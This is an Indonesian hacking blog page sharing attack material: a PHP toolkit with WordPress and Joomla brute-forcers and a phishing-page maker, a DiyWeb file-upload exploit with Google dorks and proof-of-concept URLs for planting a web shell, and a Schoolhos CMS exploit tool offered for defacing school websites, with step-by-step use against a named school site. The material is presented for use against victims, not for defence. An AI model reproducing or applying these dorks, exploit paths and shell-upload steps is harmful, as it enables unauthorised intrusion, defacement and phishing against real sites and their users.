BloggerMates

FOLLOWERS

[ Categories ]

[ Followers ]

Image

[ Partner Link ]

[ Recent Comments ]

Arnoldi-Technology

[ Advertiser ]

Code HTML/Isi Widget kalian
Diberdayakan oleh Blogger.

[PHP] TOOLS JOOMLA BRUTE, PORT SCANNER, WP BRUTE, DLL



Tools ini di kembangkan oleh salah satu anggota devilzc0de yang bernamapoticous menggunakan bahasa pemrograman PHP, tools ini sangat cocok bagi kalian yang suka melakukan pentest pada sebuah web.
mantap dah om Poti mantap

Fiturnya :
  1. Wordpress Brute Force
  2. Joomla Brute Force
  3. Reverse IP Lookup
  4. Admin Finder (Kalo ini katanya punyanya ditatompel, mahokers dari DC   piss  om)
  5. Port Scanner
  6. My IP
  7. Phiser (Phising Maker)


Oh iya jangan pernah mencoba untuk upload script ini di 000webhost atau idhostinger wew
ga bakalan work  prustasi

DIYWEB ADMIN BYPASS DAN FILE UPLOAD VULNERABILLITY

Exploit for DiyWeb File Upload Vulnerabillity

First, dorking yeah ...

Dork : Power by DiyWeb
inurl:/template.asp?menuid=
Exploit :
diyweb/menu/admin/image_manager.asp
diyweb/menu/admin/AspFIleImg/uploadtester.asp 
PoC :
http://victim.com/diyweb/menu/admin/image_manager.asp
http://victim.com/diyweb/menu/admin/AspFIleImg/uploadtester.asp

File will be upload to http://victim.com/Images/yourfilehere.php

PS: If you can't upload shell with exstension .phpyou can using tamper data or life http headers (AddOn Mozzila)


Sumber

SCHOOLHOS CMS EXPLOIT | .SCH.ID


Siang,
Tools ini sebenernya udah agak lama ane buat, tapi baru berani ngelepasnya sekarang :) (karena banyak yang tanya, "gimana sih cara deface web .sch.id itu mas?" | mungkin maksudnya "gimana cara deface web sekolahan?")
Sebenernya exploit schoolhos (Salah satu CMS sekolah yang menawarkan banyak fitur.
Alamat webnya : http://schoolhos.com/) udah lama, ga ada bedanya sih, cuman yang ini ane buat lebih simple dan lebih mudah dalam penggunaan :)

Tools : http://reyog-tools.net/tools/Schoolho.../
Dork intext:Schoolhos Free Open Source CMS



HOW TO USE THIS TOOL
(Ane tambahin karena masih banyak user yg ga ngerti/bingung cara pakenya.)

1. Pertama kita dork dulu intext:Schoolhos Free Open Source CMS di google.
2. Cari targetnya contoh (http://smkn1-pasuruan.sch.id/) dan kemudian masukin target di form. (seperti gambar di bawah ini)


3. Kemudian pilih shell anda dan upload.
4. Tunggu loadingnya, kalo berhasil maka akan di redirect ke halaman awal/index website smkn1-pasuruan.
5. Dan untuk memastikan shell terupload/tidak langsung coba buka
http://smkn1-pasuruan.sch.id/file/materi/namashell.php